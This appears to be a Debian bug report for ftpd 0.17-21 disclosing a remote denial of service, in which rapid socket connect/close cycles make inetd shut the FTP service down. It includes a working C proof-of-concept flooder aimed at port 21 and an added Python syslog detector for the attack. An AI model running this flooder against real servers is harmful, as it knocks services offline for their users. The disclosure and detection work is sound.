Package: ftpd
Status: install ok installed
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Architecture: i386
Version: 0.17-21

I'm currently running Debian testing with a few packages from unstable. I've discovered a vulnerability which would allow a remote denial of service attack in the ftpd program. It is caused by someone rapidly opening a socket, connecting to the server, then closing the socket, and I've written a small example which can be examined below.

Here's a timeline of what an attack might look like:

* program rapidly opens a socket, connect()'s, then closes the socket
* inetd redundantly reports: in.ftpd: connect from [host]
* inetd, then, reports the message: ftp/tcp server failing (looping), service terminated
* existing connections continue to work, however,
* since ftpd is down, no new connections can be established
* after about ten minutes, ftpd is restarted

As promised, here's an example program. This will attempt to use the first argument as an IP address if one is supplied, otherwise it will use 127.0.0.1.

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int sock;
    struct sockaddr_in addr;

    /* Open a TCP socket and connect to addr; exit on failure. */
    void open_socket()
    {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr)) < 0 ) {
            fprintf(stderr, "Error\n");
            close(sock);
            exit(1);
        }
    }

    int main(int argc, char * argv[])
    {
        char * address = "127.0.0.1";
        int port = 21;

        if (argc == 2)
            address = argv[1];

        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = inet_addr(address);
        addr.sin_port = htons(port);

        int over = 0;
        printf("Assaulting server\n");
        /* Connect and immediately close, 100 times. */
        while (over < 100) {
            open_socket();
            close(sock);
            over++;
        }
        return 0;
    }
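
The log sequence in the timeline above can be picked out of syslog. The following is an added example, not part of the original report: it counts "in.ftpd: connect from" lines per source in a sliding window and ties an inetd "server failing (looping)" line to the busiest source. The syslog prefix layout, host names, sample lines, window and threshold are constructed assumptions.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed classic syslog prefix: "Mon DD HH:MM:SS hostname tag[pid]: message"
STAMP = r"^(\w{3}\s+\d+ [\d:]{8}) \S+ "
CONNECT = re.compile(STAMP + r"in\.ftpd(?:\[\d+\])?: connect from (\S+)$")
LOOPING = re.compile(
    STAMP + r"inetd(?:\[\d+\])?: (\S+) server failing \(looping\), service terminated$")

def parse_ts(text, year=2000):
    # Syslog stamps carry no year; one is supplied (assumption) so strptime is unambiguous.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def find_floods(lines, window=timedelta(seconds=60), threshold=30):
    """Return (alerts, outages).
    alerts:  (source, connects_in_window, time) once per source reaching threshold.
    outages: (service, time, busiest_source, its_connects_in_window)."""
    recent, flagged, alerts, outages = {}, set(), [], []
    for line in lines:
        m = CONNECT.match(line)
        if m:
            ts, src = parse_ts(m.group(1)), m.group(2)
            q = recent.setdefault(src, deque())
            q.append(ts)
            while ts - q[0] > window:       # drop connects older than the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append((src, len(q), ts))
            continue
        m = LOOPING.match(line)
        if m:
            ts = parse_ts(m.group(1))
            counts = {s: sum(1 for t in q if ts - t <= window)
                      for s, q in recent.items()}
            top = max(counts, key=counts.get) if counts else None
            outages.append((m.group(2), ts, top, counts.get(top, 0)))
    return alerts, outages

def sample_log():
    """Constructed lines: one ordinary client, then 45 connects in 2 s from one source."""
    lines = ["Mar  3 09:58:10 ftphost in.ftpd[411]: connect from 198.51.100.20"]
    lines += [f"Mar  3 10:00:{i // 25:02d} ftphost in.ftpd[{500 + i}]: connect from 192.0.2.7"
              for i in range(45)]
    lines.append("Mar  3 10:00:02 ftphost inetd[212]: "
                 "ftp/tcp server failing (looping), service terminated")
    return lines
```

The threshold is a detection setting, not inetd's own limit; set it below the per-minute rate at which your inetd terminates a service so the alert fires before the outage.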